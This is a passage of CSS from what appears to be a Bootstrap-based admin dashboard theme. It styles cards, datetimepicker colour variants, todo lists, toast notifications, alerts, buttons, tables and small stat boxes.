.card.bg-gradient-white .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-white .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-white .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-white .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-white .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-white .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-white .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.second:hover {
background: #ebebeb;
color: #1F2D3D;
}
.card.bg-white .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #1F2D3D;
}
.card.bg-white .bootstrap-datetimepicker-widget table td.active,
.card.bg-white .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-white .bootstrap-datetimepicker-widget table td.active:hover {
background: white;
color: #1F2D3D;
}
.card-gray:not(.card-outline) > .card-header {
background-color: #6c757d;
}
.card-gray:not(.card-outline) > .card-header,
.card-gray:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-gray:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-gray.card-outline {
border-top: 3px solid #6c757d;
}
.card-gray.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-gray.card-outline-tabs > .card-header a.active {
border-top: 3px solid #6c757d;
}
.bg-gray .btn-tool,
.bg-gradient-gray .btn-tool,
.card-gray:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-gray .btn-tool:hover,
.bg-gradient-gray .btn-tool:hover,
.card-gray:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-gray .bootstrap-datetimepicker-widget .table td,
.card.bg-gray .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-gray .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gray .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gray .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gray .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gray .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.second:hover {
background: #596167;
color: #ffffff;
}
.card.bg-gray .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-gray .bootstrap-datetimepicker-widget table td.active,
.card.bg-gray .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-gray .bootstrap-datetimepicker-widget table td.active:hover {
background: #868e96;
color: #ffffff;
}
.card-gray-dark:not(.card-outline) > .card-header {
background-color: #343a40;
}
.card-gray-dark:not(.card-outline) > .card-header,
.card-gray-dark:not(.card-outline) > .card-header a {
color: #ffffff;
}
.card-gray-dark:not(.card-outline) > .card-header a.active {
color: #1F2D3D;
}
.card-gray-dark.card-outline {
border-top: 3px solid #343a40;
}
.card-gray-dark.card-outline-tabs > .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card-gray-dark.card-outline-tabs > .card-header a.active {
border-top: 3px solid #343a40;
}
.bg-gray-dark .btn-tool,
.bg-gradient-gray-dark .btn-tool,
.card-gray-dark:not(.card-outline) .btn-tool {
color: rgba(255, 255, 255, 0.8);
}
.bg-gray-dark .btn-tool:hover,
.bg-gradient-gray-dark .btn-tool:hover,
.card-gray-dark:not(.card-outline) .btn-tool:hover {
color: #ffffff;
}
.card.bg-gray-dark .bootstrap-datetimepicker-widget .table td,
.card.bg-gray-dark .bootstrap-datetimepicker-widget .table th,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget .table td,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget .table th {
border: none;
}
.card.bg-gray-dark .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.second:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table thead tr:first-child th:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.day:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.hour:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.minute:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.second:hover {
background: #222629;
color: #ffffff;
}
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.today::before,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.today::before {
border-bottom-color: #ffffff;
}
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.active,
.card.bg-gray-dark .bootstrap-datetimepicker-widget table td.active:hover,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.active,
.card.bg-gradient-gray-dark .bootstrap-datetimepicker-widget table td.active:hover {
background: #4b545c;
color: #ffffff;
}
.card {
box-shadow: 0 0 1px rgba(0, 0, 0, 0.125), 0 1px 3px rgba(0, 0, 0, 0.2);
margin-bottom: 1rem;
}
.card.bg-dark .card-header {
border-color: #383f45;
}
.card.bg-dark,
.card.bg-dark .card-body {
color: #ffffff;
}
.card.maximized-card {
height: 100% !important;
left: 0;
max-height: 100% !important;
max-width: 100% !important;
position: fixed;
top: 0;
width: 100% !important;
z-index: 9999;
}
.card.maximized-card.was-collapsed .card-body {
display: block !important;
}
.card.maximized-card [data-widget='collapse'] {
display: none;
}
.card.maximized-card .card-header,
.card.maximized-card .card-footer {
border-radius: 0 !important;
}
.card.collapsed-card .card-body,
.card.collapsed-card .card-footer {
display: none;
}
.card .nav.flex-column > li {
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
margin: 0;
}
.card .nav.flex-column > li:last-of-type {
border-bottom: 0;
}
.card.height-control .card-body {
max-height: 300px;
overflow: auto;
}
.card .border-right {
border-right: 1px solid rgba(0, 0, 0, 0.125);
}
.card .border-left {
border-left: 1px solid rgba(0, 0, 0, 0.125);
}
.card.card-tabs:not(.card-outline) > .card-header {
border-bottom: 0;
}
.card.card-tabs:not(.card-outline) > .card-header .nav-item:first-child .nav-link {
margin-left: -1px;
}
.card.card-tabs.card-outline .nav-item {
border-bottom: 0;
}
.card.card-tabs.card-outline .nav-item:first-child .nav-link {
border-left: 0;
margin-left: 0;
}
.card.card-tabs .card-tools {
margin: .3rem .5rem;
}
.card.card-tabs:not(.expanding-card).collapsed-card .card-header {
border-bottom: 0;
}
.card.card-tabs:not(.expanding-card).collapsed-card .card-header .nav-tabs {
border-bottom: 0;
}
.card.card-tabs:not(.expanding-card).collapsed-card .card-header .nav-tabs .nav-item {
margin-bottom: 0;
}
.card.card-tabs.expanding-card .card-header .nav-tabs .nav-item {
margin-bottom: -1px;
}
.card.card-outline-tabs {
border-top: 0;
}
.card.card-outline-tabs .card-header .nav-item:first-child .nav-link {
border-left: 0;
margin-left: 0;
}
.card.card-outline-tabs .card-header a {
border-top: 3px solid transparent;
}
.card.card-outline-tabs .card-header a:hover {
border-top: 3px solid #dee2e6;
}
.card.card-outline-tabs .card-header a.active:hover {
margin-top: 0;
}
.card.card-outline-tabs .card-tools {
margin: .5rem .5rem .3rem;
}
.card.card-outline-tabs:not(.expanding-card).collapsed-card .card-header {
border-bottom: 0;
}
.card.card-outline-tabs:not(.expanding-card).collapsed-card .card-header .nav-tabs {
border-bottom: 0;
}
.card.card-outline-tabs:not(.expanding-card).collapsed-card .card-header .nav-tabs .nav-item {
margin-bottom: 0;
}
.card.card-outline-tabs.expanding-card .card-header .nav-tabs .nav-item {
margin-bottom: -1px;
}
html.maximized-card {
overflow: hidden;
}
.card-header::after,
.card-body::after,
.card-footer::after {
display: block;
clear: both;
content: "";
}
.card-header {
background-color: transparent;
border-bottom: 1px solid rgba(0, 0, 0, 0.125);
padding: 0.75rem 1.25rem;
position: relative;
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
}
.collapsed-card .card-header {
border-bottom: 0;
}
.card-header > .card-tools {
float: right;
margin-right: -0.625rem;
}
.card-header > .card-tools .input-group,
.card-header > .card-tools .nav,
.card-header > .card-tools .pagination {
margin-bottom: -0.3rem;
margin-top: -0.3rem;
}
.card-header > .card-tools [data-toggle='tooltip'] {
position: relative;
}
.card-title {
float: left;
font-size: 1.1rem;
font-weight: 400;
margin: 0;
}
.card-text {
clear: both;
}
.btn-tool {
background: transparent;
color: #adb5bd;
font-size: 0.875rem;
margin: -0.75rem 0;
padding: .25rem .5rem;
}
.btn-group.show .btn-tool, .btn-tool:hover {
color: #495057;
}
.show .btn-tool, .btn-tool:focus {
box-shadow: none !important;
}
.text-sm .card-title {
font-size: 1rem;
}
.text-sm .nav-link {
padding: 0.4rem 0.8rem;
}
.card-body > .table {
margin-bottom: 0;
}
.card-body > .table > thead > tr > th,
.card-body > .table > thead > tr > td {
border-top-width: 0;
}
.card-body .fc {
margin-top: 5px;
}
.card-body .full-width-chart {
margin: -19px;
}
.card-body.p-0 .full-width-chart {
margin: -9px;
}
.chart-legend {
padding-left: 0;
list-style: none;
margin: 10px 0;
}
@media (max-width: 576px) {
.chart-legend > li {
float: left;
margin-right: 10px;
}
}
.card-comments {
background: #f8f9fa;
}
.card-comments .card-comment {
border-bottom: 1px solid #e9ecef;
padding: 8px 0;
}
.card-comments .card-comment::after {
display: block;
clear: both;
content: "";
}
.card-comments .card-comment:last-of-type {
border-bottom: 0;
}
.card-comments .card-comment:first-of-type {
padding-top: 0;
}
.card-comments .card-comment img {
height: 1.875rem;
width: 1.875rem;
float: left;
}
.card-comments .comment-text {
color: #78838e;
margin-left: 40px;
}
.card-comments .username {
color: #495057;
display: block;
font-weight: 600;
}
.card-comments .text-muted {
font-size: 12px;
font-weight: 400;
}
.todo-list {
list-style: none;
margin: 0;
overflow: auto;
padding: 0;
}
.todo-list > li {
border-radius: 2px;
background: #f8f9fa;
border-left: 2px solid #e9ecef;
color: #495057;
margin-bottom: 2px;
padding: 10px;
}
.todo-list > li:last-of-type {
margin-bottom: 0;
}
.todo-list > li > input[type='checkbox'] {
margin: 0 10px 0 5px;
}
.todo-list > li .text {
display: inline-block;
font-weight: 600;
margin-left: 5px;
}
.todo-list > li .badge {
font-size: .7rem;
margin-left: 10px;
}
.todo-list > li .tools {
color: #dc3545;
display: none;
float: right;
}
.todo-list > li .tools > .fa,
.todo-list > li .tools > .fas,
.todo-list > li .tools > .far,
.todo-list > li .tools > .fab,
.todo-list > li .tools > .glyphicon,
.todo-list > li .tools > .ion {
cursor: pointer;
margin-right: 5px;
}
.todo-list > li:hover .tools {
display: inline-block;
}
.todo-list > li.done {
color: #697582;
}
.todo-list > li.done .text {
font-weight: 500;
text-decoration: line-through;
}
.todo-list > li.done .badge {
background: #adb5bd !important;
}
.todo-list .primary {
border-left-color: #007bff;
}
.todo-list .secondary {
border-left-color: #6c757d;
}
.todo-list .success {
border-left-color: #28a745;
}
.todo-list .info {
border-left-color: #17a2b8;
}
.todo-list .warning {
border-left-color: #ffc107;
}
.todo-list .danger {
border-left-color: #dc3545;
}
.todo-list .light {
border-left-color: #f8f9fa;
}
.todo-list .dark {
border-left-color: #343a40;
}
.todo-list .lightblue {
border-left-color: #3c8dbc;
}
.todo-list .navy {
border-left-color: #001f3f;
}
.todo-list .olive {
border-left-color: #3d9970;
}
.todo-list .lime {
border-left-color: #01ff70;
}
.todo-list .fuchsia {
border-left-color: #f012be;
}
.todo-list .maroon {
border-left-color: #d81b60;
}
.todo-list .blue {
border-left-color: #007bff;
}
.todo-list .indigo {
border-left-color: #6610f2;
}
.todo-list .purple {
border-left-color: #6f42c1;
}
.todo-list .pink {
border-left-color: #e83e8c;
}
.todo-list .red {
border-left-color: #dc3545;
}
.todo-list .orange {
border-left-color: #fd7e14;
}
.todo-list .yellow {
border-left-color: #ffc107;
}
.todo-list .green {
border-left-color: #28a745;
}
.todo-list .teal {
border-left-color: #20c997;
}
.todo-list .cyan {
border-left-color: #17a2b8;
}
.todo-list .white {
border-left-color: #ffffff;
}
.todo-list .gray {
border-left-color: #6c757d;
}
.todo-list .gray-dark {
border-left-color: #343a40;
}
.todo-list .handle {
cursor: move;
display: inline-block;
margin: 0 5px;
}
.card-input {
max-width: 200px;
}
.card-default .nav-item:first-child .nav-link {
border-left: 0;
}
.modal-dialog .overlay {
background-color: #000;
display: block;
height: 100%;
left: 0;
opacity: .7;
position: absolute;
top: 0;
width: 100%;
z-index: 1052;
}
.modal-content.bg-warning .modal-header,
.modal-content.bg-warning .modal-footer {
border-color: #343a40;
}
.modal-content.bg-primary .close, .modal-content.bg-primary .mailbox-attachment-close, .modal-content.bg-secondary .close, .modal-content.bg-secondary .mailbox-attachment-close, .modal-content.bg-info .close, .modal-content.bg-info .mailbox-attachment-close, .modal-content.bg-danger .close, .modal-content.bg-danger .mailbox-attachment-close, .modal-content.bg-success .close, .modal-content.bg-success .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toasts-top-right {
position: absolute;
right: 0;
top: 0;
z-index: 1040;
}
.toasts-top-right.fixed {
position: fixed;
}
.toasts-top-left {
left: 0;
position: absolute;
top: 0;
z-index: 1040;
}
.toasts-top-left.fixed {
position: fixed;
}
.toasts-bottom-right {
bottom: 0;
position: absolute;
right: 0;
z-index: 1040;
}
.toasts-bottom-right.fixed {
position: fixed;
}
.toasts-bottom-left {
bottom: 0;
left: 0;
position: absolute;
z-index: 1040;
}
.toasts-bottom-left.fixed {
position: fixed;
}
.toast.bg-primary {
background: rgba(0, 123, 255, 0.9) !important;
}
.toast.bg-primary .close, .toast.bg-primary .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-primary .toast-header {
background: rgba(0, 123, 255, 0.85);
color: #ffffff;
}
.toast.bg-secondary {
background: rgba(108, 117, 125, 0.9) !important;
}
.toast.bg-secondary .close, .toast.bg-secondary .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-secondary .toast-header {
background: rgba(108, 117, 125, 0.85);
color: #ffffff;
}
.toast.bg-success {
background: rgba(40, 167, 69, 0.9) !important;
}
.toast.bg-success .close, .toast.bg-success .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-success .toast-header {
background: rgba(40, 167, 69, 0.85);
color: #ffffff;
}
.toast.bg-info {
background: rgba(23, 162, 184, 0.9) !important;
}
.toast.bg-info .close, .toast.bg-info .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-info .toast-header {
background: rgba(23, 162, 184, 0.85);
color: #ffffff;
}
.toast.bg-warning {
background: rgba(255, 193, 7, 0.9) !important;
}
.toast.bg-warning .toast-header {
background: rgba(255, 193, 7, 0.85);
color: #1F2D3D;
}
.toast.bg-danger {
background: rgba(220, 53, 69, 0.9) !important;
}
.toast.bg-danger .close, .toast.bg-danger .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-danger .toast-header {
background: rgba(220, 53, 69, 0.85);
color: #ffffff;
}
.toast.bg-light {
background: rgba(248, 249, 250, 0.9) !important;
}
.toast.bg-light .toast-header {
background: rgba(248, 249, 250, 0.85);
color: #1F2D3D;
}
.toast.bg-dark {
background: rgba(52, 58, 64, 0.9) !important;
}
.toast.bg-dark .close, .toast.bg-dark .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-dark .toast-header {
background: rgba(52, 58, 64, 0.85);
color: #ffffff;
}
.toast.bg-lightblue {
background: rgba(60, 141, 188, 0.9) !important;
}
.toast.bg-lightblue .close, .toast.bg-lightblue .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-lightblue .toast-header {
background: rgba(60, 141, 188, 0.85);
color: #ffffff;
}
.toast.bg-navy {
background: rgba(0, 31, 63, 0.9) !important;
}
.toast.bg-navy .close, .toast.bg-navy .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-navy .toast-header {
background: rgba(0, 31, 63, 0.85);
color: #ffffff;
}
.toast.bg-olive {
background: rgba(61, 153, 112, 0.9) !important;
}
.toast.bg-olive .close, .toast.bg-olive .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-olive .toast-header {
background: rgba(61, 153, 112, 0.85);
color: #ffffff;
}
.toast.bg-lime {
background: rgba(1, 255, 112, 0.9) !important;
}
.toast.bg-lime .toast-header {
background: rgba(1, 255, 112, 0.85);
color: #1F2D3D;
}
.toast.bg-fuchsia {
background: rgba(240, 18, 190, 0.9) !important;
}
.toast.bg-fuchsia .close, .toast.bg-fuchsia .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-fuchsia .toast-header {
background: rgba(240, 18, 190, 0.85);
color: #ffffff;
}
.toast.bg-maroon {
background: rgba(216, 27, 96, 0.9) !important;
}
.toast.bg-maroon .close, .toast.bg-maroon .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-maroon .toast-header {
background: rgba(216, 27, 96, 0.85);
color: #ffffff;
}
.toast.bg-blue {
background: rgba(0, 123, 255, 0.9) !important;
}
.toast.bg-blue .close, .toast.bg-blue .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-blue .toast-header {
background: rgba(0, 123, 255, 0.85);
color: #ffffff;
}
.toast.bg-indigo {
background: rgba(102, 16, 242, 0.9) !important;
}
.toast.bg-indigo .close, .toast.bg-indigo .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-indigo .toast-header {
background: rgba(102, 16, 242, 0.85);
color: #ffffff;
}
.toast.bg-purple {
background: rgba(111, 66, 193, 0.9) !important;
}
.toast.bg-purple .close, .toast.bg-purple .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-purple .toast-header {
background: rgba(111, 66, 193, 0.85);
color: #ffffff;
}
.toast.bg-pink {
background: rgba(232, 62, 140, 0.9) !important;
}
.toast.bg-pink .close, .toast.bg-pink .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-pink .toast-header {
background: rgba(232, 62, 140, 0.85);
color: #ffffff;
}
.toast.bg-red {
background: rgba(220, 53, 69, 0.9) !important;
}
.toast.bg-red .close, .toast.bg-red .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-red .toast-header {
background: rgba(220, 53, 69, 0.85);
color: #ffffff;
}
.toast.bg-orange {
background: rgba(253, 126, 20, 0.9) !important;
}
.toast.bg-orange .toast-header {
background: rgba(253, 126, 20, 0.85);
color: #1F2D3D;
}
.toast.bg-yellow {
background: rgba(255, 193, 7, 0.9) !important;
}
.toast.bg-yellow .toast-header {
background: rgba(255, 193, 7, 0.85);
color: #1F2D3D;
}
.toast.bg-green {
background: rgba(40, 167, 69, 0.9) !important;
}
.toast.bg-green .close, .toast.bg-green .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-green .toast-header {
background: rgba(40, 167, 69, 0.85);
color: #ffffff;
}
.toast.bg-teal {
background: rgba(32, 201, 151, 0.9) !important;
}
.toast.bg-teal .close, .toast.bg-teal .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-teal .toast-header {
background: rgba(32, 201, 151, 0.85);
color: #ffffff;
}
.toast.bg-cyan {
background: rgba(23, 162, 184, 0.9) !important;
}
.toast.bg-cyan .close, .toast.bg-cyan .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-cyan .toast-header {
background: rgba(23, 162, 184, 0.85);
color: #ffffff;
}
.toast.bg-white {
background: rgba(255, 255, 255, 0.9) !important;
}
.toast.bg-white .toast-header {
background: rgba(255, 255, 255, 0.85);
color: #1F2D3D;
}
.toast.bg-gray {
background: rgba(108, 117, 125, 0.9) !important;
}
.toast.bg-gray .close, .toast.bg-gray .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-gray .toast-header {
background: rgba(108, 117, 125, 0.85);
color: #ffffff;
}
.toast.bg-gray-dark {
background: rgba(52, 58, 64, 0.9) !important;
}
.toast.bg-gray-dark .close, .toast.bg-gray-dark .mailbox-attachment-close {
color: #ffffff;
text-shadow: 0 1px 0 #000;
}
.toast.bg-gray-dark .toast-header {
background: rgba(52, 58, 64, 0.85);
color: #ffffff;
}
.btn.disabled, .btn:disabled {
cursor: not-allowed;
}
.btn.btn-flat {
border-radius: 0;
border-width: 1px;
box-shadow: none;
}
.btn.btn-file {
overflow: hidden;
position: relative;
}
.btn.btn-file > input[type='file'] {
background: #ffffff;
cursor: inherit;
display: block;
font-size: 100px;
min-height: 100%;
min-width: 100%;
opacity: 0;
outline: none;
position: absolute;
right: 0;
text-align: right;
top: 0;
}
.text-sm .btn {
font-size: 0.875rem !important;
}
.btn-default {
background-color: #f8f9fa;
border-color: #ddd;
color: #444;
}
.btn-default:hover, .btn-default:active, .btn-default.hover {
background-color: #e9ecef;
color: #2b2b2b;
}
.btn-app {
border-radius: 3px;
background-color: #f8f9fa;
border: 1px solid #ddd;
color: #6c757d;
font-size: 12px;
height: 60px;
margin: 0 0 10px 10px;
min-width: 80px;
padding: 15px 5px;
position: relative;
text-align: center;
}
.btn-app > .fa,
.btn-app > .fas,
.btn-app > .far,
.btn-app > .fab,
.btn-app > .glyphicon,
.btn-app > .ion {
display: block;
font-size: 20px;
}
.btn-app:hover {
background: #f8f9fa;
border-color: #aaaaaa;
color: #444;
}
.btn-app:active, .btn-app:focus {
box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-app > .badge {
font-size: 10px;
font-weight: 400;
position: absolute;
right: -10px;
top: -3px;
}
.btn-xs {
padding: 0.125rem 0.25rem;
font-size: 0.75rem;
line-height: 1.5;
border-radius: 0.15rem;
}
.callout {
border-radius: 0.25rem;
box-shadow: 0 1px 3px rgba(0, 0, 0, 0.12), 0 1px 2px rgba(0, 0, 0, 0.24);
background-color: #ffffff;
border-left: 5px solid #e9ecef;
margin-bottom: 1rem;
padding: 1rem;
}
.callout a {
color: #495057;
text-decoration: underline;
}
.callout a:hover {
color: #e9ecef;
}
.callout p:last-child {
margin-bottom: 0;
}
.callout.callout-danger {
border-left-color: #bd2130;
}
.callout.callout-warning {
border-left-color: #d39e00;
}
.callout.callout-info {
border-left-color: #117a8b;
}
.callout.callout-success {
border-left-color: #1e7e34;
}
.alert .icon {
margin-right: 10px;
}
.alert .close, .alert .mailbox-attachment-close {
color: #000;
opacity: .2;
}
.alert .close:hover, .alert .mailbox-attachment-close:hover {
opacity: .5;
}
.alert a {
color: #ffffff;
text-decoration: underline;
}
.alert-primary {
color: #ffffff;
background: #007bff;
border-color: #006fe6;
}
.alert-default-primary {
color: #004085;
background-color: #cce5ff;
border-color: #b8daff;
}
.alert-default-primary hr {
border-top-color: #9fcdff;
}
.alert-default-primary .alert-link {
color: #002752;
}
.alert-secondary {
color: #ffffff;
background: #6c757d;
border-color: #60686f;
}
.alert-default-secondary {
color: #383d41;
background-color: #e2e3e5;
border-color: #d6d8db;
}
.alert-default-secondary hr {
border-top-color: #c8cbcf;
}
.alert-default-secondary .alert-link {
color: #202326;
}
.alert-success {
color: #ffffff;
background: #28a745;
border-color: #23923d;
}
.alert-default-success {
color: #155724;
background-color: #d4edda;
border-color: #c3e6cb;
}
.alert-default-success hr {
border-top-color: #b1dfbb;
}
.alert-default-success .alert-link {
color: #0b2e13;
}
.alert-info {
color: #ffffff;
background: #17a2b8;
border-color: #148ea1;
}
.alert-default-info {
color: #0c5460;
background-color: #d1ecf1;
border-color: #bee5eb;
}
.alert-default-info hr {
border-top-color: #abdde5;
}
.alert-default-info .alert-link {
color: #062c33;
}
.alert-warning {
color: #1F2D3D;
background: #ffc107;
border-color: #edb100;
}
.alert-default-warning {
color: #856404;
background-color: #fff3cd;
border-color: #ffeeba;
}
.alert-default-warning hr {
border-top-color: #ffe8a1;
}
.alert-default-warning .alert-link {
color: #533f03;
}
.alert-danger {
color: #ffffff;
background: #dc3545;
border-color: #d32535;
}
.alert-default-danger {
color: #721c24;
background-color: #f8d7da;
border-color: #f5c6cb;
}
.alert-default-danger hr {
border-top-color: #f1b0b7;
}
.alert-default-danger .alert-link {
color: #491217;
}
.alert-light {
color: #1F2D3D;
background: #f8f9fa;
border-color: #e9ecef;
}
.alert-default-light {
color: #818182;
background-color: #fefefe;
border-color: #fdfdfe;
}
.alert-default-light hr {
border-top-color: #ececf6;
}
.alert-default-light .alert-link {
color: #686868;
}
.alert-dark {
color: #ffffff;
background: #343a40;
border-color: #292d32;
}
.alert-default-dark {
color: #1b1e21;
background-color: #d6d8d9;
border-color: #c6c8ca;
}
.alert-default-dark hr {
border-top-color: #b9bbbe;
}
.alert-default-dark .alert-link {
color: #040505;
}
.table:not(.table-dark) {
color: inherit;
}
.table.table-head-fixed thead tr:nth-child(1) th {
background-color: #ffffff;
border-bottom: 0;
box-shadow: inset 0 1px 0 #dee2e6, inset 0 -1px 0 #dee2e6;
position: -webkit-sticky;
position: sticky;
top: 0;
z-index: 10;
}
.table.table-head-fixed.table-dark thead tr:nth-child(1) th {
background-color: #212529;
box-shadow: inset 0 1px 0 #383f45, inset 0 -1px 0 #383f45;
}
.table.no-border,
.table.no-border td,
.table.no-border th {
border: 0;
}
.table.text-center,
.table.text-center td,
.table.text-center th {
text-align: center;
}
.table.table-valign-middle thead > tr > th,
.table.table-valign-middle thead > tr > td,
.table.table-valign-middle tbody > tr > th,
.table.table-valign-middle tbody > tr > td {
vertical-align: middle;
}
.card-body.p-0 .table thead > tr > th:first-of-type,
.card-body.p-0 .table thead > tr > td:first-of-type,
.card-body.p-0 .table tbody > tr > th:first-of-type,
.card-body.p-0 .table tbody > tr > td:first-of-type {
padding-left: 1.5rem;
}
.card-body.p-0 .table thead > tr > th:last-of-type,
.card-body.p-0 .table thead > tr > td:last-of-type,
.card-body.p-0 .table tbody > tr > th:last-of-type,
.card-body.p-0 .table tbody > tr > td:last-of-type {
padding-right: 1.5rem;
}
.carousel-control.left, .carousel-control.right {
background-image: none;
}
.carousel-control > .fa,
.carousel-control > .fas,
.carousel-control > .far,
.carousel-control > .fab,
.carousel-control > .glyphicon,
.carousel-control > .ion {
display: inline-block;
font-size: 40px;
margin-top: -20px;
position: absolute;
top: 50%;
z-index: 5;
}
.small-box {
border-radius: 0.25rem;
box-shadow: 0 0 1px rgba(0, 0, 0, 0.125), 0 1px 3px rgba(0, 0, 0, 0.2);
display: block;
margin-bottom: 20px;
position: relative;
}
.small-box > .inner {
padding: 10px;
}
.small-box > .small-box-footer {
background: rgba(0, 0, 0, 0.1);
color: rgba(255, 255, 255, 0.8);
display: block;
padding: 3px 0;
position: relative;
text-align: center;
text-decoration: none;
z-index: 10;
}
.small-box > .small-box-footer:hover {
background: rgba(0, 0, 0, 0.15);
color: #ffffff;
}
.small-box h3 {
font-size: 2.2rem;
font-weight: bold;
margin: 0 0 10px 0;
padding: 0;
white-space: nowrap;
}
@media (min-width: 992px) {
.col-xl-2 .small-box h3,
.col-lg-2 .small-box h3,
.col-md-2 .small-box h3 {
font-size: 1.6rem;
}
.col-xl-3 .small-box h3,
.col-lg-3 .small-box h3,
.col-md-3 .small-box h3 {
font-size: 1.6rem;
}
}
@media (min-width: 1200px) {
.col-xl-2 .small-box h3,
.col-lg-2 .small-box h3,
.col-md-2 .small-box h3 {
font-size: 2.2rem;
}
.col-xl-3 .small-box h3,
.col-lg-3 .small-box h3,
.col-md-3 .small-box h3 {
font-size: 2.2rem;
}
}
.small-box p {
font-size: 1rem;
}
.small-box p > small {
color: #f8f9fa;
display: block;
font-size: 0.9rem;
margin-top: 5px;
}
.small-box h3,
.small-box p {
z-index: 5;
}
.small-box .icon {
color: rgba(0, 0, 0, 0.15);
z-index: 0;
}
.small-box .icon > i {
font-size: 90px;
position: absolute;
right: 15px;
top: 15px;
transition: all 0.3s linear;
}
.small-box .icon > i.fa, .small-box .icon > i.fas, .small-box .icon > i.far, .small-box .icon > i.fab, .small-box .icon > i.glyphicon, .small-box .icon > i.ion {
font-size: 70px;
top: 20px;
}
.small-box:hover {
text-decoration: none;
}
.small-box:hover .icon > i {
font-size: 95px;
}
